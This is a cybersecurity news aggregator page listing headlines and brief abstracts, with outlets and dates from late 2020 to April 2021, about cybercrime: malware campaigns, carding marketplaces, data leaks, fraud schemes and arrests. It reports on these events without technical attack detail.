Abstract Criminals are increasingly leveraging digital tech in areas such as communication and finances

Infosecurity Magazine

April 12, 2021

Criminals spread malware using website contact forms with Google URLs Full Text

Abstract Microsoft is warning businesses to beware of cybercriminals using company website contact forms to deliver the IcedID info-stealing banking trojan in email with Google URLs to employees.

ZDNet

April 10, 2021

This man was planning to kill 70% of Internet in a bomb attack against AWS Full Text

Abstract The FBI arrested a man for allegedly planning a bomb attack against Amazon Web Services (AWS) to kill about 70% of the internet. The FBI arrested Seth Aaron Pendley (28), from Texas, for allegedly planning to launch a bomb attack against Amazon Web Services...

Security Affairs

April 8, 2021

Cybercriminals Crack Cheat Codes and Gaming Mods to Serve Trojans Full Text

Abstract The methodology of the attack involved adding cryptors to cheat codes, cheat engines, and mods that made it challenging for security teams to analyze the attack.

Cyware Alerts - Hacker News

April 06, 2021

EtterSilent maldoc builder used by top cybercriminal gangs Full Text

Abstract A malicious document builder named EtterSilent is gaining more attention on underground forums, security researchers note. As its popularity increased, the developer kept improving it to avoid detection from security solutions.

BleepingComputer

April 5, 2021

Did Facebook’s business model make the company an easier target for cybercriminals? Full Text

Abstract Some researchers argue that the situation showcases why Facebook must revisit how it handles and secures personal information.

SCMagazine

April 5, 2021

Pastor Charged with Sharing CSAM Full Text

Abstract Daytona Beach pastor allegedly shared child sexual abuse material in online chat rooms

Infosecurity Magazine

April 2, 2021

Cybercriminal hacks vaccine marketplace, makes over $752K Full Text

Abstract In a bizarre incident, a hacker has taken down a vaccine marketplace being run on the Dark Web, created fake orders, canceled them, and took a refund in Bitcoins worth $752,000.

The Times Of India

March 31, 2021

5-star customer service: fraudsters launch massive campaign against Indonesia’s major banks on Twitter Full Text

Abstract Experts warn that cybercriminals are targeting Indonesia’s major banks posing as bank representatives or customer support team members on Twitter. Group-IB, a global threat hunting and adversary-centric cyber intelligence company, warns of an ongoing...

Security Affairs

March 30, 2021

#LORCALive: Nation State Cooperation Essential to Fighting Scourge of Cybercrime Full Text

Abstract Can more dialogue be promoted between rival nations?

Infosecurity Magazine

March 23, 2021

Cybercriminals exchange tips on avoiding arrest, jail in underground forums Full Text

Abstract Researchers analyzing underground forums have revealed insight into the methodology behind cyberattacker targets -- as well as what criminals say to do if, or when, they are caught.

ZDNet

March 19, 2021

A Picture is Better than Thousand Words Full Text

Abstract Researchers from Sucuri recently discovered a tactic, practiced by Magecart groups, to hide malicious activity by saving stolen credit card data into a JPEG file.

Cyware Alerts - Hacker News

March 15, 2021

OVH Data Center Fire Impacts Cyber-criminals Full Text

Abstract Major fire at Strasbourg data center knocks millions of websites offline and disrupts threat actors

Infosecurity Magazine

March 12, 2021

Cyber criminals targeting hospitals are ‘playing with lives’ and must be stopped, report warns Full Text

Abstract Cyberattacks targeting healthcare are putting patients at unnecessary risk and more must be done to hold the cybercriminals involved to account, warns the CyberPeace Institute.

ZDNet

March 11, 2021

FIN8 cybercrime group resurges with improved hacking tool Full Text

Abstract A financially-motivated hacking group that appeared to drop off the map a year-and-a-half ago is back with a new and improved backdoor, according to Bitdefender research published Wednesday.

Cyberscoop

March 5, 2021

Cybercriminals Target Industrial Organizations in Information Theft Campaign Full Text

Abstract A mysterious cybercrime group apparently driven by profit has been targeting industrial organizations in Europe, Asia and North America as part of an information theft campaign.

Security Week

March 5, 2021

Cybercriminals Finding Ways to Bypass ‘3D Secure’ Fraud Prevention System Full Text

Abstract Security researchers with threat intelligence firm Gemini Advisory say they have observed dark web activities related to bypassing 3D Secure (3DS), which is designed to improve the security of online credit and debit card transactions.

Security Week

March 4, 2021

Cryptocurrency Fraudster Steals $16m Full Text

Abstract Swede admits defrauding over 3,500 victims with elaborate crypto pension scam

Infosecurity Magazine

March 4, 2021

Cybercriminals innovate to find vulnerabilities that can be monetized Full Text

Abstract The healthcare industry remains most at risk, particularly through web gateways, and phishing is still a high-risk vector in this sector, according to cybersecurity experts.

Help Net Security

March 3, 2021

Missing Teens Used School Laptops to Chat with Alleged Abductors Full Text

Abstract Disappearance of North Carolina teenagers allegedly linked to men they met online

Infosecurity Magazine

February 24, 2021

France Warns of Cybercriminals Selling 50,000 Stolen Credentials of Hospital Agents Full Text

Abstract The alert notes that the credential list appears to have been sold on February 4, and that so far "only a few establishment domain names have been identified, which have been notified directly."

Gov Info Security

February 23, 2021

FIN11 cybercrime group is behind recent wave of attacks on FTA servers Full Text

Abstract FireEye experts linked a series of attacks targeting Accellion File Transfer Appliance (FTA) servers to the cybercrime group UNC2546, aka FIN11. Security experts from FireEye linked a series of cyber attacks against organizations running Accellion...

Security Affairs

February 23, 2021

Cybercriminals Misuse Telegram API to Create Malicious Domains to Harvest User Credentials Full Text

Abstract This particular phishing attack appeared active in mid-December 2020 and has since stopped. The targets of these malicious emails mainly worked in the U.K. financial services sector, Cofense notes.

Gov Info Security

February 22, 2021

BBC Reports Theft of 105 Electrical Devices Full Text

Abstract Devices such as laptops and mobile phones taken from BBC premises in the past two years

Infosecurity Magazine

February 19, 2021

Darknet Markets Compete to Replace Joker’s Stash Full Text

Abstract Cybercriminal gangs operating darknet stolen payment card marketplaces are scrambling to attract customers from the now-closed Joker's Stash card market, according to Kela and Flashpoint.

Gov Info Security

February 18, 2021

Cybercriminal Enterprise ‘Ringleaders’ Stole $55M Via COVID-19 Fraud, Romance Scams Full Text

Abstract The Department of Justice (DoJ) cracked down on a Ghana-based cybercriminal enterprise behind a slew of romance scams, COVID-19 fraud attacks and business email compromise schemes since 2013.

Threatpost

February 18, 2021

Software Firm Owner Admits Fraud and CSAM Possession Full Text

Abstract Agents find indecent images of children while investigating Virginia businessman for fraud

Infosecurity Magazine

February 16, 2021

Neighbor Revealed as Cyber-Stalker Full Text

Abstract Durban man admits targeting neighbors in cyber-stalking campaign

Infosecurity Magazine

February 16, 2021

Most Europeans Don’t Know How to Report Cybercrime Full Text

Abstract Brits are among the most clued-up

Infosecurity Magazine

February 16, 2021

270 addresses are responsible for 55% of all cryptocurrency money laundering Full Text

Abstract Criminals who keep their funds in cryptocurrency tend to launder funds through a small cluster of online services, blockchain investigations firm Chainalysis said in a report last week.

ZDNet

February 14, 2021

The kingpin behind Joker’s Stash retires with a billionaire exit Full Text

Abstract The administrators of the most popular carding marketplace on the dark web Joker's Stash announced his retirement. Cybercriminal behind the most prominent carding marketplace on the dark web Joker's Stash retires, he will shut down its servers and destroy...

Security Affairs

February 12, 2021

Diners Devour Made-to-Order Fraud Full Text

Abstract Cyber-criminals use Telegram to sell food bought with stolen credit cards to hungry users

Infosecurity Magazine

February 12, 2021

Brazilian Authorities Investigate New Cybercriminal Leak of 102 Million Consumers Full Text

Abstract Brazil's National Data Protection Authority (ANPD, in the Portuguese acronym) has informed today (11) that it has started an investigation into the country's second-largest data leak of the year.

ZDNet

February 11, 2021

Love is in the air—and cybercriminals are taking advantage Full Text

Abstract Over 400 malicious Valentine's Day-themed phishing individual email campaigns were spotted on a weekly basis in January, according to data collected by Check Point Research.

Tech Republic

February 10, 2021

Cybercriminals Leverage Discord CDN Service to Target Gamers with Malware Payloads Full Text

Abstract Malware-tainted files are disguised as cracked software or gaming software in order to target gamers – an attractive target for miscreants because they typically use high specification PCs.

The Daily Swig

February 9, 2021

Cybercriminals Claim to Steal Source Code for Cyberpunk 2077, The Witcher 3 Games Developed by CD Projekt Full Text

Abstract Video game company CD Projekt says a cyberattack exposed some of its data, and the intruders left a ransom note claiming they accessed the source code for “Cyberpunk 2077” and other games.

Cyberscoop

February 3, 2021

Retail Sector Still a Favorite Playground for Cybercriminals Full Text

Abstract Retail firms are back on the targets of cyber adversaries; several organizations were hit by a variety of threats including phishing campaigns, code injection, and ransomware attacks lately.

Cyware Alerts - Hacker News

February 3, 2021

Cybercriminals Claim to Leak Police Exam Database Containing 500,000 Indian Citizens’ Personal Details Full Text

Abstract While the threat actor does not mention the name of an organization, the data provided in the sample is potentially associated with a police exam conducted on December 22, 2019.

Security Affairs

January 29, 2021

Cryptocurrency crime drops in 2020 but ‘DeFi’ breaches rise Full Text

Abstract Losses from cryptocurrency theft, hacks, and fraud fell 57% last year to $1.9 billion, but crime in the ‘decentralized finance’ space continued to grow, a report from CipherTrace showed.

Cyber News

January 27, 2021

Personal Details of over 176 million Pakistani Mobile Phone Users Sold on Hacker Forum Full Text

Abstract It can allow cybercriminals to carry out SMSishing, SIM Swapping attacks, and identity scams while State-backed actors can use the data for all sorts of malicious purposes.

Hackread

January 27, 2021

Growing Digital Adoption Providing Extra Opportunities for Cyber-Criminals Full Text

Abstract Rising digital adoption making UK consumers more vulnerable

Infosecurity Magazine

January 26, 2021

Researchers Connect MrbMiner Crypto-Mining Operations to Iranian Software Firm Full Text

Abstract Experts at SophosLabs have linked MrbMiner, a cryptomining malware surfaced that infected thousands of MSSQL databases last year, to an Iran-based software development company.

Cyware Alerts - Hacker News

January 25, 2021

Over 8 Million Teespring User Records Leaked on Hacker Forum Full Text

Abstract The archive included email addresses and last update dates for 8,242,000 user accounts, full names, phone numbers, locations, and other account details of over 4 million users and apparel creators.

Cyber News

January 23, 2021

A Home Security Tech Hacked Into Cameras To Watch People Undressing And Having Sex, Prosecutors Say Full Text

Abstract A home security technician admitted that he secretly accessed the cameras of more than 200 customers, particularly attractive women, to spy on while they undressed, slept, or had sex.

Buzzfeed

January 23, 2021

Why North Korea Excels in Cybercrime Full Text

Abstract Although the US and the United Nations have levied sanctions meant to prevent the illegal financing of nuclear weapons, North Korea is proving to be adept at sidestepping them — and is also remarkably proficient at cybercrime.

Dark Reading

January 22, 2021

Home Security Technician Admits Spying on Customers Full Text

Abstract Security technician hacked into customers’ home surveillance cameras for sexual gratification

Infosecurity Magazine

January 22, 2021

Court Date for Woman Accused in Theft of Pelosi’s Laptop Full Text

Abstract Pennsylvanian suspected of helping to steal Nancy Pelosi’s laptop to appear before federal court on Monday

Infosecurity Magazine

January 22, 2021

Data of 2 million MyFreeCams users sold on a hacker forum Full Text

Abstract A threat actor was offering for sale on a hacker forum data from 2 million users allegedly stolen from the adult streaming site MyFreeCams. A threat actor was offering for sale on a hacker forum a database containing user records allegedly stolen...

Security Affairs

January 22, 2021

Cybercriminals Resort to Shady Ad Practices that Rip Off Users Full Text

Abstract A report from Group-IB revealed that classified ads scammers have earned more than $6.5 million in 2020, from buyers in a widespread operation dubbed Classiscam.

Cyware Alerts - Hacker News

January 21, 2021

Hackers Leak 325,000 User Records of BuyUCoin Crypto Exchange on the Dark Web Full Text

Abstract The leaked data included names, e-mails, mobile numbers, encrypted passwords, user wallet details, order details, bank details, KYC details, and deposit history of users based in India.

The Times Of India

January 21, 2021

Threat Actor Dumps 1.9 Million Pixlr Records Online Full Text

Abstract ShinyHunters claims to have emails and hashed passwords

Infosecurity Magazine

January 20, 2021

Hacker posts 1.9 million Pixlr user records for free on forum Full Text

Abstract A hacker has leaked 1.9 million Pixlr user records containing information that could be used to perform targeted phishing and credential stuffing attacks.

BleepingComputer

January 20, 2021

Hacker posts 1.4 million Pixlr user records for free on forum Full Text

Abstract A hacker has leaked 1.4 million Pixlr user records containing information that could be used to perform targeted phishing and credential stuffing attacks.

BleepingComputer

January 19, 2021

Hackers Claim to Leak Over 500,000 Records of C-Level Executives From Capital Economics Full Text

Abstract During a routine dark web monitoring, researchers from Cyble found a leak of over 500,000 records of C-level executives from Capital Economics on a Russian-speaking forum.

Security Affairs

January 19, 2021

Joker’s Stash Carding Market to Call it Quits — Krebs on Security Full Text

Abstract Joker’s Stash, which is by some accounts the largest underground shop for selling stolen credit card and identity data, says it’s closing up shop effective mid-February 2021.

Krebs on Security

January 18, 2021

Joker’s Stash Carding Site to Close in February Full Text

Abstract Site admin announces retirement after alleged bout of COVID-19

Infosecurity Magazine

January 18, 2021

Leaked #COVID19 Vaccine Data “Manipulated” to Mislead Public Full Text

Abstract Disinformation effort could undermine trust in vaccines, warns EMA

Infosecurity Magazine

January 18, 2021

Joker’s Stash, the Largest Underground Carding Marketplace, Shuts Down Full Text

Abstract Security experts from the FBI and Interpol have recently seized several servers of the large carder site, Joker's Stash, temporarily disrupted the...

Cyber Security News

January 16, 2021

Stolen credit card shop Joker’s Stash closes after making a fortune Full Text

Abstract The administrator of Joker's Stash, one of the longest-running marketplace for stolen credit cards, announced on Friday that they would permanently shut down the operation next month.

BleepingComputer

January 16, 2021

Massive stolen credit card shop Joker’s Stash shuts down Full Text

Abstract The administrator of Joker's Stash, one of the longest-running marketplace for stolen credit cards, announced on Friday that they would permanently shut down the operation next month.

BleepingComputer

January 16, 2021

Joker’s Stash, the largest carding site, is shutting down Full Text

Abstract Joker's Stash to shut down on February 15, 2021. Joker’s Stash, the largest carding marketplace online announced that it was shutting down its operations on February 15, 2021. Joker’s Stash, the largest carding marketplace online, announced...

Security Affairs

January 16, 2021

Joker’s Stash, the internet’s largest carding forum, is shutting down Full Text

Abstract Joker's Stash, the internet's notorious and largest marketplace for buying & selling stolen card data, announced that it was shutting down within a month, on February 15, 2021.

ZDNet

January 15, 2021

Florida Man Cyberstalked Survivor of Murder Attempt Full Text

Abstract Cross City man pleads guilty to cyberstalking woman who survived violent encounter in childhood

Infosecurity Magazine

January 15, 2021

Automated “Classiscam” Operation Made $6.5m in 2020 Full Text

Abstract E-commerce scam-as-a-service comes to Europe from Russia

Infosecurity Magazine

January 14, 2021

Files Allegedly Obtained in SolarWinds Hack Offered for Sale Full Text

Abstract Someone has set up a website named SolarLeaks where they are offering to sell gigabytes of files allegedly obtained as a result of the recently disclosed SolarWinds breach.

Security Week

January 13, 2021

World’s largest dark-web marketplace shuttered after Euro cybercops cuff Aussie Full Text

Abstract Europol cops have taken down dark-web souk DarkMarket, after arresting an Australian citizen living in Germany who they claim was operating the world's biggest online bazaar of its kind.

The Register

January 13, 2021

Top Penetration Testing Toolkits Abused by Cybercriminals Full Text

Abstract A security firm tracked tens and thousands of malware C&C servers used across over 80 malware families; more than a quarter of all the servers used Cobalt Strike and Metasploit.

Cyware Alerts - Hacker News

January 12, 2021

SolarLeaks site claims to sell data stolen in SolarWinds attacks Full Text

Abstract A website named 'SolarLeaks' is selling data they claim was stolen from companies confirmed to have been breached in the SolarWinds attack.

BleepingComputer

January 08, 2021

Laptop stolen from Pelosi’s office during Capitol riots Full Text

Abstract An aide for Speaker Nancy Pelosi (D-Calif.) said Friday that a laptop was stolen from the Speaker's office during the riots in the Capitol earlier this week, adding to existing security concerns. 

The Hill

January 07, 2021

SEO scammer extorts site owners using porn backlinks threat Full Text

Abstract Website owners are receiving emails threatening to ruin their reputation if they do not post a five-star review for a cryptocurrency exchange.

BleepingComputer

January 5, 2021

NCA Arrested 21 Customers who Advertised Stolen Personal Credentials Full Text

Abstract Britain's National Crime Agency announced that 21 individuals have been arrested across the UK on suspicion of purchasing personally identifiable information from the WeLeakInfo...

Cyber Security News

January 4, 2021

Greedy Cybercriminals Stealthily Abuse GitHub Service to Host Malware Full Text

Abstract In a recent report, Octoverse revealed that almost a fifth (around 17%) of all software bugs in GitHub were intentionally placed as backdoors by cybercriminals.

Cyware Alerts - Hacker News

January 3, 2021

Over 200 million records of Chinese Citizens for Sale on the Darkweb Full Text

Abstract During a routine Dark web monitoring, the Research team at Cyble found threat actors selling 200 million+ Records of Chinese Citizens. During a routine Dark web monitoring, the Research team at Cyble found multiple posts where threat actors are offering...

Security Affairs

December 31, 2020

Threat actor is selling 368.8 million records from 26 data breaches Full Text

Abstract A data breach broker is selling user records allegedly from twenty-six data breaches on a hacker forum. Security experts from Bleeping Computer reported that a threat actor is selling user records allegedly stolen from twenty-six companies on a hacker...

Security Affairs

December 31, 2020

Data breach broker selling user records stolen from 26 companies Full Text

Abstract A data breach broker is selling the allegedly stolen user records for twenty-six companies on a hacker forum, BleepingComputer has learned.

BleepingComputer

December 31, 2020

Cybercriminals Claim to Leak Door Controls USA’s 140GB Database on Hacker Forum Full Text

Abstract The archive was leaked on November 27-28. It appears to have been posted on the hacker forum after Door Controls USA seemingly refused to pay ransom to attackers who breached the company’s network.

CyberNews

December 28, 2020

Threat actor is selling a dump allegedly including 2,5M customers of service provider Ho Mobile Full Text

Abstract Threat intelligence analyst discovered a threat actor that is selling a database of the Italian mobile service provider Ho mobile. Threat intelligence analyst @Bank_Security first spotted on a popular hacking forum a threat actor that is selling...

Security Affairs

December 28, 2020

UK NCA visits WeLeakInfo users to warn of using stolen data Full Text

Abstract 21 WeLeakInfo customers have been arrested across the UK for using stolen credentials downloaded from WeLeakInfo following an operation coordinated by the UK National Crime Agency (NCA).

BleepingComputer

December 24, 2020

‘UltraRank’ JavaScript-Sniffer Attack Campaign Hits Dozen E-Commerce Sites Full Text

Abstract A cybercriminal gang known as "UltraRank" has launched a new campaign, targeting at least a dozen e-commerce sites to steal payment card data using a JavaScript sniffer, says security firm Group-IB.

Info Risk Today

December 24, 2020

Bulletproof VPN Seized by Global Police Operation for Providing Services to CyberCriminals Full Text

Abstract United States law enforcement joins international partners to disrupt a VPN service used to facilitate criminal activity. The Safe-Inet, a virtual private...

Cyber Security News

December 22, 2020

Thousands of Emulated Mobile Devices Used to Steal Millions of Dollars Full Text

Abstract IBM Trusteer researchers laid bare an automated mobile fraud operation that initiated illicit transactions and stole millions from the bank accounts of thousands of customers.

Cyware Alerts - Hacker News

December 22, 2020

Police Seize VPN Service Beloved by Cyber-criminals Full Text

Abstract German police lead operation to shut down Safe-Inet service and seize its infrastructure

Infosecurity Magazine

December 22, 2020

Cybercriminals’ Favorite Bulletproof VPN Service Shuts Down In Global Action Full Text

Abstract Law enforcement agencies from the US, Germany, Netherlands, Switzerland, France, along with Europol's European Cybercrime Centre (EC3), announced today the coordinated takedown of Safe-Inet, a popular virtual private network (VPN) service that was used to facilitate criminal activity. The three domains in question — insorg[.]org, safe-inet[.]com, and safe-inet[.]net — were shut down, and their infrastructure seized as part of a joint investigation called "Operation Nova." Europol called Safe-Inet a cybercriminals' " favorite ." A crucial reason for the domains' seizure has been their central role in facilitating ransomware, carrying out web-skimming, spear-phishing, and account takeover attacks. The service, which comes with support for Russian and English languages and has been active for over a decade, offered " bulletproof hosting services " to website visitors, often at a steep price at a high price to the criminal underworld. As of

The Hacker News

December 22, 2020

Bulletproof VPN services took down in a global police operation Full Text

Abstract A joint operation conducted by law European enforcement agencies resulted in the seizure of the infrastructure of three bulletproof VPN services. A joint operation conducted by law enforcement agencies from the US, Germany, France, Switzerland, and the Netherlands...

Security Affairs

December 20, 2020

A massive fraud operation used mobile device emulators to steal millions from online bank accounts Full Text

Abstract Experts uncovered a massive fraud operation that used a network of mobile device emulators to steal millions of dollars from online bank accounts. Researchers from IBM Trusteer have uncovered a massive fraud operation that leveraged a network of mobile...

Security Affairs

December 19, 2020

FBI and Interpol shut down some servers of Joker’s Stash carding marketplace Full Text

Abstract Joker's Stash, the largest carding marketplace online, was shut down by a coordinated operation conducted by the FBI and the Interpol. Joker's Stash, the largest carding marketplace online, was shut down as a result of a coordinated operation conducted...

Security Affairs

December 18, 2020

A ‘coordinated police’ action against the Joker’s Stash took a small domain offline Full Text

Abstract An ongoing law enforcement operation has disrupted aspects of a leading website where internet scammers frequently buy and sell stolen data, according to the site’s administrators.

Cyberscoop

December 17, 2020

Healthcare.gov Data Thief Jailed Full Text

Abstract Prison for tech company employee who stole PII and used it for financial gain

Infosecurity Magazine

December 16, 2020

Emulated mobile devices used to steal millions from US, EU banks Full Text

Abstract Threat actors behind an ongoing worldwide mobile banking fraud campaign were able to steal millions from multiple US and EU banks, needing just a few days for each attack.

BleepingComputer

December 16, 2020

Massive Fraud Operation Used Mobile Emulator Farms to Steal Millions of Dollars Full Text

Abstract The scale of this fraud operation is one that has never been seen before, in some cases, over 20 emulators were used in the spoofing of well over 16,000 compromised devices.

Security Intelligence

December 15, 2020

Ohio Couple Sold Secrets to China Full Text

Abstract Husband of researcher who sold hospital’s secrets to China admits his part in conspiracy

Infosecurity Magazine

December 15, 2020

#BSEC: Staying Alert to the Growing Dangers of Cybercrime Full Text

Abstract Cybercrime is becoming easier to conduct and successful attacks more consequential

Infosecurity Magazine

December 15, 2020

Former Cisco Engineer Gets Two Years for $2.4M Insider Attack Full Text

Abstract Sudhish Kasaba Ramesh, 31, of San Jose, pleaded guilty back in August to one count of intentionally accessing a protected computer without authorization and recklessly causing damage to Cisco.

Infosecurity Magazine

December 14, 2020

Sipulimarket Dark Web Marketplace Seized by Finnish Customs Full Text

Abstract Finnish Customs (Tulli) closed the Sipulimarket dark web marketplace on Friday and seized all its content. This recent hit...

Cyber Security News

December 11, 2020

Ex-Cisco engineer who nuked 16k WebEx accounts goes to prison Full Text

Abstract Sudhish Kasaba Ramesh, a former Cisco engineer, was sentenced on Wednesday to two years in prison and ordered to pay a $15,000 fine for shutting down more than 16,000 WebEx Teams accounts and over 450 virtual machines in 2018,

BleepingComputer

December 10, 2020

Teen who shook the Internet in 2016 pleads guilty to DDoS attacks Full Text

Abstract One of the operators behind a Mirai botnet pleaded guilty to their involvement in a huge DDoS attack that caused a massive Internet disruption during October 2016.

BleepingComputer

Table of contents